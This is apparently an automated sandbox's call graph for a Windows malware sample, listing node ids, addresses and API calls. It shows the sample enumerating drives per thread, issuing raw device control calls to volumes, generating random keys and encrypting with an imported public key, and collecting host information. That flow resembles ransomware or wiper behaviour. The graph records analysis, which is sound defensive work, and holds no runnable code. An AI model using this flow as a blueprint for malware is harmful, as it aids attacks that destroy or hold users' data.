df5c9f __ld12tod 5 API calls 8801->8802 8803 df21e6 8802->8803 8803->8754 8804->8801 8805 df219c 8804->8805 8806 df5c9f __ld12tod 5 API calls 8805->8806 8807 df21d1 8806->8807 8807->8754 8809 df231f FindVolumeClose 8808->8809 8810 df22e7 8808->8810 8811 df5c9f __ld12tod 5 API calls 8809->8811 8812 df20a0 105 API calls 8810->8812 8813 df2338 8811->8813 8814 df22f2 8812->8814 8813->8758 8815 df230e 8814->8815 8816 df22f6 8814->8816 8818 df5c9f __ld12tod 5 API calls 8815->8818 8817 df22b0 105 API calls 8816->8817 8819 df22fc 8817->8819 8820 df231b 8818->8820 8821 df5c9f __ld12tod 5 API calls 8819->8821 8820->8758 8822 df230a 8821->8822 8822->8758 8824 df5d9a 8823->8824 8826 df5db2 8823->8826 8825 df7924 __cftof2_l 66 API calls 8824->8825 8828 df5d9f 8825->8828 8827 df5dd6 8826->8827 8829 df5dc1 8826->8829 8840 df6b80 8827->8840 8830 df78d2 __cftof2_l 11 API calls 8828->8830 8831 df7924 __cftof2_l 66 API calls 8829->8831 8838 df2111 DeviceIoControl 8830->8838 8833 df5dc6 8831->8833 8834 df78d2 __cftof2_l 11 API calls 8833->8834 8834->8838 8836 df5e17 8836->8838 8839 df7b5f __flsbuf 97 API calls 8836->8839 8838->8800 8838->8801 8839->8838 8887 df61fe 8840->8887 8843 df7924 __cftof2_l 66 API calls 8844 df6bec 8843->8844 8845 df6bfa 8844->8845 8862 df6c28 __snwprintf __aulldvrm _strlen 8844->8862 8846 df7924 __cftof2_l 66 API calls 8845->8846 8848 df6bff 8846->8848 8847 df6c0a 8850 df5c9f __ld12tod 5 API calls 8847->8850 8849 df78d2 __cftof2_l 11 API calls 8848->8849 8849->8847 8851 df5e09 8850->8851 8851->8836 8851->8838 8866 df7b5f 8851->8866 8852 df6aea 99 API calls __snwprintf 8852->8862 8853 df5e4c _free 66 API calls 8853->8862 8854 df7245 RtlDecodePointer 8854->8862 8856 dfa68e 78 API calls __input_l 8856->8862 8857 df76e3 8859 df7924 __cftof2_l 66 API calls 8857->8859 8858 dfb12a __malloc_crt 66 API calls 8858->8862 8861 df76e8 8859->8861 8860 df72b2 RtlDecodePointer 8860->8862 8865 df78d2 __cftof2_l 11 API calls 8861->8865 8862->8847 8862->8852 8862->8853 8862->8854 8862->8856 8862->8857 8862->8858 8862->8860 8863 df6b19 99 API calls __snwprintf 8862->8863 8864 df72d4 RtlDecodePointer 8862->8864 8895 dfa7be 8862->8895 8863->8862 8864->8862 8865->8847 8994 dfb4e0 8866->8994 8868 df7b6f 8869 df7b7a 8868->8869 8870 df7b91 8868->8870 8871 df7924 __cftof2_l 66 API calls 8869->8871 8872 df7b95 8870->8872 8875 df7ba2 __flswbuf 8870->8875 8874 df7b7f 8871->8874 8873 df7924 __cftof2_l 66 API calls 8872->8873 8873->8874 8874->8836 8875->8874 8883 df7bf8 8875->8883 8886 df7c03 8875->8886 9001 dfb48a 8875->9001 8876 df7c92 8880 dfc398 __write 97 API calls 8876->8880 8877 df7c12 8878 df7c29 8877->8878 8879 df7c46 8877->8879 9013 dfc398 8878->9013 8879->8874 9038 dfbbb1 8879->9038 8880->8874 8883->8886 9010 dfc46c 8883->9010 8886->8876 8886->8877 8888 df6211 8887->8888 8894 df625e 8887->8894 8898 dfa0b6 8888->8898 8891 df623e 8891->8894 8918 df970c 8891->8918 8894->8843 8896 df61fe _LocaleUpdate::_LocaleUpdate 76 API calls 8895->8896 8897 dfa7d1 8896->8897 8897->8862 8899 dfa03d __getptd_noexit 66 API calls 8898->8899 8900 dfa0be 8899->8900 8901 df7fae __amsg_exit 66 API calls 8900->8901 8902 df6216 8900->8902 8901->8902 8902->8891 8903 df9e8d 8902->8903 8904 df9e99 ___lock_fhandle 8903->8904 8905 dfa0b6 __getptd 66 API calls 8904->8905 8906 df9e9e 8905->8906 8907 df9ecc 8906->8907 8909 df9eb0 8906->8909 8908 df94b6 __lock 66 API calls 8907->8908 8910 df9ed3 8908->8910 8911 dfa0b6 __getptd 66 API calls 8909->8911 8934 df9e40 8910->8934 8913 df9eb5 8911->8913 8915 df9ec3 ___lock_fhandle 8913->8915 8917 df7fae __amsg_exit 66 API calls 8913->8917 8915->8891 8917->8915 8919 df9718 ___lock_fhandle 8918->8919 8920 dfa0b6 __getptd 66 API calls 8919->8920 8921 df971d 8920->8921 8922 df94b6 __lock 66 API calls 8921->8922 8923 df972f 8921->8923 8924 df974d 8922->8924 8926 df973d ___lock_fhandle 8923->8926 8930 df7fae __amsg_exit 66 API calls 8923->8930 8925 df9796 8924->8925 8927 df977e InterlockedIncrement 8924->8927 8928 df9764 InterlockedDecrement 8924->8928 8990 df97a7 8925->8990 8926->8894 8927->8925 8928->8927 8931 df976f 8928->8931 8930->8926 8931->8927 8932 df5e4c _free 66 API calls 8931->8932 8933 df977d 8932->8933 8933->8927 8935 df9e4d 8934->8935 8936 df9e82 8934->8936 8935->8936 8937 df9bcd ___addlocaleref 8 API calls 8935->8937 8942 df9efa 8936->8942 8938 df9e63 8937->8938 8938->8936 8945 df9c5c 8938->8945 8989 df93dd RtlLeaveCriticalSection 8942->8989 8944 df9f01 8944->8913 8946 df9c6d InterlockedDecrement 8945->8946 8947 df9cf0 8945->8947 8948 df9c85 8946->8948 8949 df9c82 InterlockedDecrement 8946->8949 8947->8936 8959 df9cf5 8947->8959 8950 df9c8f InterlockedDecrement 8948->8950 8951 df9c92 8948->8951 8949->8948 8950->8951 8952 df9c9f 8951->8952 8953 df9c9c InterlockedDecrement 8951->8953 8954 df9ca9 InterlockedDecrement 8952->8954 8956 df9cac 8952->8956 8953->8952 8954->8956 8955 df9cc5 InterlockedDecrement 8955->8956 8956->8955 8957 df9cd5 InterlockedDecrement 8956->8957 8958 df9ce0 InterlockedDecrement 8956->8958 8957->8956 8958->8947 8960 df9d79 8959->8960 8961 df9d0c 8959->8961 8962 df9dc6 8960->8962 8963 df5e4c _free 66 API calls 8960->8963 8961->8960 8964 df9d40 8961->8964 8971 df5e4c _free 66 API calls 8961->8971 8965 dfd49f ___free_lc_time 66 API calls 8962->8965 8975 df9def 8962->8975 8966 df9d9a 8963->8966 8968 df9d61 8964->8968 8979 df5e4c _free 66 API calls 8964->8979 8967 df9de4 8965->8967 8969 df5e4c _free 66 API calls 8966->8969 8972 df5e4c _free 66 API calls 8967->8972 8970 df5e4c _free 66 API calls 8968->8970 8974 df9dad 8969->8974 8976 df9d6e 8970->8976 8977 df9d35 8971->8977 8972->8975 8973 df9e34 8978 df5e4c _free 66 API calls 8973->8978 8981 df5e4c _free 66 API calls 8974->8981 8975->8973 8980 df5e4c 66 API calls _free 8975->8980 8982 df5e4c _free 66 API calls 8976->8982 8983 dfd87f ___free_lconv_mon 66 API calls 8977->8983 8984 df9e3a 8978->8984 8985 df9d56 8979->8985 8980->8975 8986 df9dbb 8981->8986 8982->8960 8983->8964 8984->8936 8987 dfd816 ___free_lconv_num 66 API calls 8985->8987 8988 df5e4c _free 66 API calls 8986->8988 8987->8968 8988->8962 8989->8944 8993 df93dd RtlLeaveCriticalSection 8990->8993 8992 df97ae 8992->8923 8993->8992 8995 dfb4ec 8994->8995 8996 dfb501 8994->8996 8997 df7924 __cftof2_l 66 API calls 8995->8997 8996->8868 8998 dfb4f1 8997->8998 8999 df78d2 __cftof2_l 11 API calls 8998->8999 9000 dfb4fc 8999->9000 9000->8868 9002 dfb497 9001->9002 9003 dfb4a6 9001->9003 9004 df7924 __cftof2_l 66 API calls 9002->9004 9006 dfb4c4 9003->9006 9007 df7924 __cftof2_l 66 API calls 9003->9007 9005 dfb49c 9004->9005 9005->8883 9006->8883 9008 dfb4b7 9007->9008 9009 df78d2 __cftof2_l 11 API calls 9008->9009 9009->9005 9011 dfb12a __malloc_crt 66 API calls 9010->9011 9012 dfc481 9011->9012 9012->8886 9014 dfc3a4 ___lock_fhandle 9013->9014 9015 dfc3ac 9014->9015 9016 dfc3c7 9014->9016 9063 df7937 9015->9063 9018 dfc3d3 9016->9018 9021 dfc40d 9016->9021 9020 df7937 __lseeki64 66 API calls 9018->9020 9023 dfc3d8 9020->9023 9066 dfe676 9021->9066 9022 df7924 __cftof2_l 66 API calls 9031 dfc3b9 ___lock_fhandle 9022->9031 9024 df7924 __cftof2_l 66 API calls 9023->9024 9026 dfc3e0 9024->9026 9028 df78d2 __cftof2_l 11 API calls 9026->9028 9027 dfc413 9029 dfc435 9027->9029 9030 dfc421 9027->9030 9028->9031 9033 df7924 __cftof2_l 66 API calls 9029->9033 9076 dfbc9b 9030->9076 9031->8874 9035 dfc43a 9033->9035 9034 dfc42d 9135 dfc464 9034->9135 9036 df7937 __lseeki64 66 API calls 9035->9036 9036->9034 9039 dfbbbd ___lock_fhandle 9038->9039 9040 dfbbce 9039->9040 9041 dfbbea 9039->9041 9043 df7937 __lseeki64 66 API calls 9040->9043 9042 dfbbf6 9041->9042 9047 dfbc30 9041->9047 9044 df7937 __lseeki64 66 API calls 9042->9044 9045 dfbbd3 9043->9045 9046 dfbbfb 9044->9046 9048 df7924 __cftof2_l 66 API calls 9045->9048 9049 df7924 __cftof2_l 66 API calls 9046->9049 9050 dfe676 ___lock_fhandle 68 API calls 9047->9050 9059 dfbbdb ___lock_fhandle 9048->9059 9051 dfbc03 9049->9051 9052 dfbc36 9050->9052 9053 df78d2 __cftof2_l 11 API calls 9051->9053 9054 dfbc44 9052->9054 9055 dfbc60 9052->9055 9053->9059 9057 dfbb2c __lseeki64_nolock 68 API calls 9054->9057 9056 df7924 __cftof2_l 66 API calls 9055->9056 9058 dfbc65 9056->9058 9060 dfbc55 9057->9060 9061 df7937 __lseeki64 66 API calls 9058->9061 9059->8874 9174 dfbc91 9060->9174 9061->9060 9064 dfa03d __getptd_noexit 66 API calls 9063->9064 9065 df793c 9064->9065 9065->9022 9067 dfe682 ___lock_fhandle 9066->9067 9068 dfe6dc 9067->9068 9069 df94b6 __lock 66 API calls 9067->9069 9070 dfe6fe ___lock_fhandle 9068->9070 9071 dfe6e1 RtlEnterCriticalSection 9068->9071 9072 dfe6ae 9069->9072 9070->9027 9071->9070 9073 dfe6b7 InitializeCriticalSectionAndSpinCount 9072->9073 9074 dfe6ca 9072->9074 9073->9074 9138 dfe70c 9074->9138 9077 dfbcaa __write_nolock 9076->9077 9078 dfbcff 9077->9078 9079 dfbce0 9077->9079 9102 dfbcd5 9077->9102 9082 dfbd5b 9078->9082 9083 dfbd3e 9078->9083 9080 df7937 __lseeki64 66 API calls 9079->9080 9084 dfbce5 9080->9084 9081 df5c9f __ld12tod 5 API calls 9085 dfc396 9081->9085 9087 dfbd6e 9082->9087 9142 dfbb2c 9082->9142 9086 df7937 __lseeki64 66 API calls 9083->9086 9088 df7924 __cftof2_l 66 API calls 9084->9088 9085->9034 9089 dfbd43 9086->9089 9092 dfb48a __write_nolock 66 API calls 9087->9092 9091 dfbcec 9088->9091 9093 df7924 __cftof2_l 66 API calls 9089->9093 9094 df78d2 __cftof2_l 11 API calls 9091->9094 9095 dfbd77 9092->9095 9097 dfbd4b 9093->9097 9094->9102 9096 dfc019 9095->9096 9101 dfa0b6 __getptd 66 API calls 9095->9101 9099 dfc2c9 WriteFile 9096->9099 9100 dfc028 9096->9100 9098 df78d2 __cftof2_l 11 API calls 9097->9098 9098->9102 9105 dfc2fc GetLastError 9099->9105 9106 dfbffb 9099->9106 9103 dfc0e3 9100->9103 9110 dfc03b 9100->9110 9104 dfbd92 GetConsoleMode 9101->9104 9102->9081 9119 dfc0f0 9103->9119 9126 dfc1bd 9103->9126 9104->9096 9108 dfbdbb 9104->9108 9105->9106 9106->9102 9107 dfc347 9106->9107 9113 dfc31a 9106->9113 9107->9102 9112 df7924 __cftof2_l 66 API calls 9107->9112 9108->9096 9109 dfbdcb GetConsoleCP 9108->9109 9109->9106 9130 dfbdee 9109->9130 9110->9106 9110->9107 9111 dfc085 WriteFile 9110->9111 9111->9105 9111->9110 9114 dfc36a 9112->9114 9116 dfc339 9113->9116 9117 dfc325 9113->9117 9121 df7937 __lseeki64 66 API calls 9114->9121 9115 dfc22e WideCharToMultiByte 9115->9105 9123 dfc265 WriteFile 9115->9123 9155 df794a 9116->9155 9122 df7924 __cftof2_l 66 API calls 9117->9122 9118 dfc15f WriteFile 9118->9105 9118->9119 9119->9106 9119->9107 9119->9118 9121->9102 9124 dfc32a 9122->9124 9125 dfc29c GetLastError 9123->9125 9123->9126 9128 df7937 __lseeki64 66 API calls 9124->9128 9125->9126 9126->9106 9126->9107 9126->9115 9126->9123 9128->9102 9129 dfbe9a WideCharToMultiByte 9129->9106 9132 dfbecb WriteFile 9129->9132 9130->9105 9130->9106 9130->9129 9131 dfa7a4 78 API calls __fassign 9130->9131 9133 dfa64c WriteConsoleW CreateFileW __write_nolock 9130->9133 9134 dfbf1f WriteFile 9130->9134 9152 dfa7f6 9130->9152 9131->9130 9132->9105 9132->9130 9133->9130 9134->9105 9134->9130 9173 dfe715 RtlLeaveCriticalSection 9135->9173 9137 dfc46a 9137->9031 9141 df93dd RtlLeaveCriticalSection 9138->9141 9140 dfe713 9140->9068 9141->9140 9160 dfe60d 9142->9160 9144 dfbb4a 9145 dfbb63 SetFilePointer 9144->9145 9146 dfbb52 9144->9146 9147 dfbb57 9145->9147 9148 dfbb7b GetLastError 9145->9148 9149 df7924 __cftof2_l 66 API calls 9146->9149 9147->9087 9148->9147 9150 dfbb85 9148->9150 9149->9147 9151 df794a __dosmaperr 66 API calls 9150->9151 9151->9147 9153 dfa7be __isleadbyte_l 76 API calls 9152->9153 9154 dfa805 9153->9154 9154->9130 9156 df7937 __lseeki64 66 API calls 9155->9156 9157 df7955 __dosmaperr 9156->9157 9158 df7924 __cftof2_l 66 API calls 9157->9158 9159 df7968 9158->9159 9159->9102 9161 dfe61a 9160->9161 9162 dfe632 9160->9162 9163 df7937 __lseeki64 66 API calls 9161->9163 9165 df7937 __lseeki64 66 API calls 9162->9165 9166 dfe671 9162->9166 9164 dfe61f 9163->9164 9167 df7924 __cftof2_l 66 API calls 9164->9167 9168 dfe643 9165->9168 9166->9144 9170 dfe627 9167->9170 9169 df7924 __cftof2_l 66 API calls 9168->9169 9171 dfe64b 9169->9171 9170->9144 9172 df78d2 __cftof2_l 11 API calls 9171->9172 9172->9170 9173->9137 9177 dfe715 RtlLeaveCriticalSection 9174->9177 9176 dfbc99 9176->9059 9177->9176 9179 df4230 9178->9179 9180 df3d00 5 API calls 9179->9180 9181 df4260 EnumWindows 9179->9181 9180->9179 9183 df3d00 5 API calls 9181->9183 9184 df4288 9183->9184 9185 df5c9f __ld12tod 5 API calls 9184->9185 9186 df4293 9185->9186 9186->8781 9188 df3d4c DeviceIoControl 9187->9188 9189 df3d25 CreateFileW 9187->9189 9190 df3d6e 9188->9190 9192 df3d68 GetLastError 9188->9192 9189->9190 9191 df3d3e TlsSetValue 9189->9191 9190->8782 9191->9188 9192->9190 9196 df64dd 9193->9196 9197 df64fb 9196->9197 9198 df6513 9196->9198 9199 df7924 __cftof2_l 66 API calls 9197->9199 9200 df6537 9198->9200 9202 df6522 9198->9202 9201 df6500 9199->9201 9205 df6b80 __snwprintf 102 API calls 9200->9205 9203 df78d2 __cftof2_l 11 API calls 9201->9203 9204 df7924 __cftof2_l 66 API calls 9202->9204 9211 df650b 9203->9211 9206 df6527 9204->9206 9207 df656b 9205->9207 9208 df78d2 __cftof2_l 11 API calls 9206->9208 9209 df6579 9207->9209 9210 df7b5f __flsbuf 97 API calls 9207->9210 9207->9211 9208->9211 9209->9211 9212 df7b5f __flsbuf 97 API calls 9209->9212 9210->9209 9211->8608 9212->9211 9214 df5cba ___lock_fhandle 9213->9214 9215 df5cdd __flswbuf 9214->9215 9216 df5cc8 9214->9216 9259 df697d 9215->9259 9217 df7924 __cftof2_l 66 API calls 9216->9217 9218 df5ccd 9217->9218 9220 df78d2 __cftof2_l 11 API calls 9218->9220 9229 df5cd8 ___lock_fhandle 9220->9229 9221 df5cef __flswbuf 9264 df6a1a 9221->9264 9223 df5d01 __flswbuf 9224 df6b80 __snwprintf 102 API calls 9223->9224 9225 df5d19 __flswbuf 9224->9225 9271 df6ab6 9225->9271 9229->8621 9231 df61cc ___lock_fhandle 9230->9231 9232 df94b6 __lock 66 API calls 9231->9232 9233 df61d3 9232->9233 9291 df60e7 9233->9291 9237 df61ec ___lock_fhandle 9237->8623 9309 df5f1a 9238->9309 9240 df46b1 CreateEventW 9241 df1f30 GetLogicalDrives 9240->9241 9242 df1f60 9241->9242 9243 df1f70 GetDriveTypeW 9242->9243 9245 df2001 9242->9245 9243->9242 9244 df1f93 LocalAlloc 9243->9244 9244->9242 9247 df1fa1 CreateThread 9244->9247 9246 df5c9f __ld12tod 5 API calls 9245->9246 9248 df200e WaitForSingleObject 9246->9248 9247->9242 9249 df1fe4 WaitForSingleObject CloseHandle 9247->9249 9248->8637 9248->8644 9249->9242 9251 df44bb GetFileSize 9250->9251 9252 df4544 9250->9252 9253 df44c9 GetProcessHeap HeapAlloc 9251->9253 9254 df4534 CloseHandle 9251->9254 9252->8626 9255 df4522 9253->9255 9256 df44e3 ReadFile 9253->9256 9254->8626 9255->9254 9256->9255 9257 df44fd 9256->9257 9257->9255 9258 df4502 GetProcessHeap HeapFree CloseHandle 9257->9258 9258->8626 9260 df698a 9259->9260 9261 df69a0 RtlEnterCriticalSection 9259->9261 9262 df94b6 __lock 66 API calls 9260->9262 9261->9221 9263 df6993 9262->9263 9263->9221 9265 dfb4e0 __input_l 66 API calls 9264->9265 9266 df6a29 9265->9266 9267 dfb48a __write_nolock 66 API calls 9266->9267 9269 df6a2f __flswbuf 9267->9269 9268 df6a7c 9268->9223 9269->9268 9270 dfb12a __malloc_crt 66 API calls 9269->9270 9270->9268 9272 df5d2a 9271->9272 9273 df6ac1 9271->9273 9275 df5d42 9272->9275 9273->9272 9279 dfb2f7 9273->9279 9276 df5d47 __flswbuf 9275->9276 9285 df69eb 9276->9285 9278 df5d52 9278->9229 9280 dfb310 9279->9280 9284 dfb332 9279->9284 9281 dfb4e0 __input_l 66 API calls 9280->9281 9280->9284 9282 dfb32b 9281->9282 9283 dfc398 __write 97 API calls 9282->9283 9283->9284 9284->9272 9286 df6a0e RtlLeaveCriticalSection 9285->9286 9287 df69fb 9285->9287 9286->9278 9290 df93dd RtlLeaveCriticalSection 9287->9290 9289 df6a0b 9289->9278 9290->9289 9292 df6106 9291->9292 9293 df6114 9291->9293 9298 df5c9f __ld12tod 5 API calls 9292->9298 9294 df611d 9293->9294 9295 df6122 9293->9295 9307 df92ce CreateFileW 9294->9307 9295->9292 9297 df612f GetConsoleMode SetConsoleMode 9295->9297 9300 df617d ReadConsoleInputA 9297->9300 9299 df61b0 9298->9299 9304 df61f5 9299->9304 9301 df6193 9300->9301 9303 df6154 __getextendedkeycode 9300->9303 9302 df6196 SetConsoleMode 9301->9302 9302->9292 9303->9300 9303->9301 9303->9302 9308 df93dd RtlLeaveCriticalSection 9304->9308 9306 df61fc 9306->9237 9307->9295 9308->9306 9310 df5f26 ___lock_fhandle 9309->9310 9311 df5f49 __flswbuf 9310->9311 9312 df5f34 9310->9312 9315 df697d _flsall 67 API calls 9311->9315 9313 df7924 __cftof2_l 66 API calls 9312->9313 9314 df5f39 9313->9314 9316 df78d2 __cftof2_l 11 API calls 9314->9316 9318 df5f55 __flswbuf 9315->9318 9317 df5f44 ___lock_fhandle 9316->9317 9317->9240 9320 df5f87 9318->9320 9321 df5f8c __flswbuf 9320->9321 9322 df69eb _vwscanf 2 API calls 9321->9322 9323 df5f94 9322->9323 9323->9317 9347 df5910 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime GetSystemDirectoryW 9324->9347 9327 df57b0 102 API calls 9328 df5a95 9327->9328 9329 df57b0 102 API calls 9328->9329 9330 df5ab1 9329->9330 9331 df5810 106 API calls 9330->9331 9332 df5ab9 WaitForSingleObject 9331->9332 9333 df5b32 9332->9333 9341 df5ad4 9332->9341 9334 df57b0 102 API calls 9333->9334 9336 df5b4b 9334->9336 9335 df5910 111 API calls 9335->9341 9337 df57b0 102 API calls 9336->9337 9339 df5b67 9337->9339 9338 df57b0 102 API calls 9338->9341 9340 df5810 106 API calls 9339->9340 9342 df5b6f 9340->9342 9341->9335 9341->9338 9343 df5810 106 API calls 9341->9343 9344 df5c9f __ld12tod 5 API calls 9342->9344 9345 df5b1e WaitForSingleObject 9343->9345 9346 df5b85 9344->9346 9345->9333 9345->9341 9348 df5999 PathAppendW 9347->9348 9355 df5a3d 9347->9355 9350 df5a02 9348->9350 9348->9355 9349 df5c9f __ld12tod 5 API calls 9351 df5a4b 9349->9351 9352 df57b0 102 API calls 9350->9352 9351->9327 9353 df5a32 9352->9353 9354 df5810 106 API calls 9353->9354 9354->9355 9355->9349 9357 dfa63a 9356->9357 9360 dfa37a 9357->9360 9361 df61fe _LocaleUpdate::_LocaleUpdate 76 API calls 9360->9361 9363 dfa38e 9361->9363 9362 dfa3a0 9364 df7924 __cftof2_l 66 API calls 9362->9364 9363->9362 9368 dfa3d7 9363->9368 9365 dfa3a5 9364->9365 9367 df78d2 __cftof2_l 11 API calls 9365->9367 9370 df572a 9367->9370 9369 dfa3fb __input_l wcstoxq __aulldvrm 9368->9369 9372 dfd97d 9368->9372 9369->9370 9371 df7924 __cftof2_l 66 API calls 9369->9371 9370->8681 9371->9370 9373 dfd98e 9372->9373 9374 dfd992 9372->9374 9373->9368 9375 dfd9ad GetStringTypeW 9374->9375 9376 dfd99d 9374->9376 9375->9376 9376->9368 9378 df12ce CryptGenRandom CryptReleaseContext 9377->9378 9379 df12c1 GetLastError 9377->9379 9380 df12ed MultiByteToWideChar 9378->9380 9379->9378 9379->9380 9380->8692 9382 df15c6 GetLastError 9381->9382 9383 df15e3 9381->9383 9385 df163e 9382->9385 9386 df15d3 CryptAcquireContextW 9382->9386 9447 df1080 CryptStringToBinaryW 9383->9447 9385->8695 9385->8696 9386->9383 9386->9385 9387 df1632 CryptReleaseContext 9387->9385 9388 df15f8 9388->9387 9458 df1320 9388->9458 9390 df1623 CryptDestroyKey 9390->9387 9496 df2d80 9391->9496 9394 df2d80 138 API calls 9395 df5074 9394->9395 9398 df50a7 9395->9398 9508 df2fb0 9395->9508 9397 df5087 9397->9398 9531 df32c0 9397->9531 9398->8700 9402 df48f0 9398->9402 9403 df490a 9402->9403 9404 df4920 9402->9404 9403->9404 9406 df4930 9403->9406 9405 df5c9f __ld12tod 5 API calls 9404->9405 9407 df492c 9405->9407 9408 df5c9f __ld12tod 5 API calls 9406->9408 9407->8702 9409 df4945 9408->9409 9409->8702 9411 df236a TlsGetValue 9410->9411 9412 df23e3 9410->9412 9413 df237c CreateFileW 9411->9413 9414 df23a3 DeviceIoControl 9411->9414 9412->8705 9417 df23cd VirtualLock 9413->9417 9418 df2395 TlsSetValue 9413->9418 9415 df23dc 9414->9415 9416 df23c3 GetLastError 9414->9416 9415->9412 9419 df2408 TlsGetValue DeviceIoControl 9415->9419 9416->9415 9416->9417 9417->9415 9418->9414 9420 df2457 9419->9420 9421 df3820 8 API calls 9420->9421 9422 df2463 9421->9422 9422->8705 9424 df3839 CreateFileW 9423->9424 9425 df3860 DeviceIoControl 9423->9425 9426 df388a VirtualQuery 9424->9426 9427 df3852 TlsSetValue 9424->9427 9428 df38c8 9425->9428 9429 df3880 GetLastError 9425->9429 9426->9428 9430 df389f 9426->9430 9427->9425 9431 df38cb VirtualFree 9428->9431 9429->9426 9429->9428 9430->9431 9432 df38c0 VirtualUnlock 9430->9432 9431->8708 9432->9428 9437 df4cb5 9433->9437 9435 df4cdf TlsGetValue DeviceIoControl 9435->9437 9436 df4d22 WaitForSingleObject 9436->9437 9438 df4dc7 9436->9438 9437->9435 9440 df4d53 TlsGetValue DeviceIoControl 9437->9440 9441 df4dd9 9437->9441 9444 df4db0 9437->9444 9713 df25a0 9437->9713 9439 df2020 5 API calls 9438->9439 9439->9441 9440->9437 9440->9441 9442 df5c9f __ld12tod 5 API calls 9441->9442 9443 df4def 9442->9443 9443->8706 9445 df5c9f __ld12tod 5 API calls 9444->9445 9446 df4dc3 9445->9446 9446->8706 9448 df10ae LocalAlloc 9447->9448 9449 df1154 9447->9449 9450 df114a 9448->9450 9451 df10c4 CryptStringToBinaryW 9448->9451 9449->9388 9450->9388 9452 df10d8 CryptDecodeObjectEx 9451->9452 9453 df1143 LocalFree 9451->9453 9452->9453 9454 df10fe LocalAlloc 9452->9454 9453->9450 9454->9453 9455 df1110 CryptDecodeObjectEx 9454->9455 9456 df113c LocalFree 9455->9456 9457 df1128 CryptImportPublicKeyInfo 9455->9457 9456->9453 9457->9456 9459 df1587 9458->9459 9460 df1352 LocalAlloc 9458->9460 9461 df5c9f __ld12tod 5 API calls 9459->9461 9462 df1570 9460->9462 9463 df1370 GetSystemDefaultLCID GetTimeZoneInformation 9460->9463 9465 df1595 9461->9465 9464 df5c9f __ld12tod 5 API calls 9462->9464 9466 df1390 _memmove 9463->9466 9467 df1583 9464->9467 9465->9390 9468 df13a4 NetWkstaGetInfo 9466->9468 9467->9390 9475 df13cb _memmove 9468->9475 9470 df14a7 9471 df155b LocalFree 9470->9471 9472 df14b2 LocalAlloc 9470->9472 9471->9462 9472->9471 9474 df14d4 _memmove 9472->9474 9489 df1220 CryptBinaryToStringW 9474->9489 9478 df1160 9475->9478 9477 df1545 LocalFree 9477->9471 9479 df1217 9478->9479 9480 df1173 9478->9480 9479->9470 9480->9479 9481 df117b CryptEncrypt 9480->9481 9482 df119d LocalAlloc 9481->9482 9483 df1205 9481->9483 9484 df120e 9482->9484 9485 df11b4 _memmove 9482->9485 9483->9470 9484->9470 9486 df11c3 CryptEncrypt 9485->9486 9486->9483 9487 df11e4 LocalFree 9486->9487 9487->9483 9490 df128c 9489->9490 9491 df1240 LocalAlloc 9489->9491 9490->9477 9492 df1255 CryptBinaryToStringW 9491->9492 9493 df1284 9491->9493 9494 df126a 9492->9494 9495 df1275 LocalFree 9492->9495 9493->9477 9494->9477 9495->9477 9497 df2d8d __write_nolock 9496->9497 9498 df2020 5 API calls 9497->9498 9499 df2db1 9498->9499 9551 df35d0 9499->9551 9501 df2dd3 9502 df2e2f 9501->9502 9574 df2800 9501->9574 9504 df5c9f __ld12tod 5 API calls 9502->9504 9506 df2e3f 9504->9506 9505 df2e19 9505->9502 9507 df2800 126 API calls 9505->9507 9506->9394 9506->9398 9507->9502 9509 df2fbd __write_nolock 9508->9509 9510 df35d0 116 API calls 9509->9510 9511 df2fe1 9510->9511 9512 df30fb 9511->9512 9513 df39e0 105 API calls 9511->9513 9514 df5c9f __ld12tod 5 API calls 9512->9514 9515 df3009 9513->9515 9516 df310d 9514->9516 9517 df302c 9515->9517 9518 df3018 9515->9518 9516->9397 9658 df2e50 9517->9658 9519 df5c9f __ld12tod 5 API calls 9518->9519 9521 df3028 9519->9521 9521->9397 9523 df30ec CloseHandle 9524 df5e4c _free 66 API calls 9523->9524 9524->9512 9525 df5e86 _malloc 66 API calls 9526 df3060 9525->9526 9527 df3069 9526->9527 9528 df3af0 68 API calls 9526->9528 9527->9523 9530 df308a 9528->9530 9529 df5e4c _free 66 API calls 9529->9527 9530->9529 9532 df32cd __write_nolock 9531->9532 9533 df35d0 116 API calls 9532->9533 9534 df32e4 9533->9534 9535 df3338 9534->9535 9667 df3120 9534->9667 9536 df5c9f __ld12tod 5 API calls 9535->9536 9539 df3347 9536->9539 9538 df3326 9538->9535 9540 df3120 114 API calls 9538->9540 9539->9398 9541 df3540 9539->9541 9540->9535 9542 df354d __write_nolock 9541->9542 9543 df35d0 116 API calls 9542->9543 9544 df3564 9543->9544 9545 df35b6 9544->9545 9689 df3350 9544->9689 9546 df5c9f __ld12tod 5 API calls 9545->9546 9548 df35c5 9546->9548 9548->9398 9549 df35a5 9549->9545 9550 df3350 114 API calls 9549->9550 9550->9545 9552 df35dd _memset __write_nolock 9551->9552 9553 df35ff CreateFileW 9552->9553 9554 df3629 9553->9554 9555 df3641 DeviceIoControl 9553->9555 9556 df5c9f __ld12tod 5 API calls 9554->9556 9557 df366c 9555->9557 9558 df36e4 DeviceIoControl 9555->9558 9560 df363d 9556->9560 9561 df3687 DeviceIoControl 9557->9561 9558->9557 9559 df3726 DeviceIoControl 9558->9559 9559->9561 9564 df3750 9559->9564 9560->9501 9562 df36af 9561->9562 9563 df3766 DeviceIoControl 9561->9563 9606 df2650 9562->9606 9569 df36d4 CloseHandle 9563->9569 9570 df3789 9563->9570 9566 df5c9f __ld12tod 5 API calls 9564->9566 9568 df3762 9566->9568 9568->9501 9571 df5c9f __ld12tod 5 API calls 9569->9571 9570->9569 9573 df2650 109 API calls 9570->9573 9572 df3817 9571->9572 9572->9501 9573->9570 9575 df39e0 105 API calls 9574->9575 9576 df282f 9575->9576 9577 df283c 9576->9577 9578 df2852 9576->9578 9579 df5c9f __ld12tod 5 API calls 9577->9579 9580 df285b 9578->9580 9581 df2865 FindResourceW 9578->9581 9582 df284e 9579->9582 9583 df2a5c CloseHandle 9580->9583 9581->9580 9584 df2885 SizeofResource LoadResource LockResource 9581->9584 9582->9505 9586 df5e4c _free 66 API calls 9583->9586 9584->9580 9585 df28b8 9584->9585 9587 df28d8 FindResourceW 9585->9587 9588 df2915 FindResourceW 9585->9588 9589 df2a71 9586->9589 9590 df294e 9587->9590 9591 df28ea SizeofResource LoadResource LockResource 9587->9591 9588->9590 9592 df2927 SizeofResource LoadResource LockResource 9588->9592 9593 df2a84 9589->9593 9594 df5e4c _free 66 API calls 9589->9594 9590->9580 9597 df5e86 _malloc 66 API calls 9590->9597 9591->9590 9592->9590 9595 df5c9f __ld12tod 5 API calls 9593->9595 9594->9593 9596 df2a96 9595->9596 9596->9505 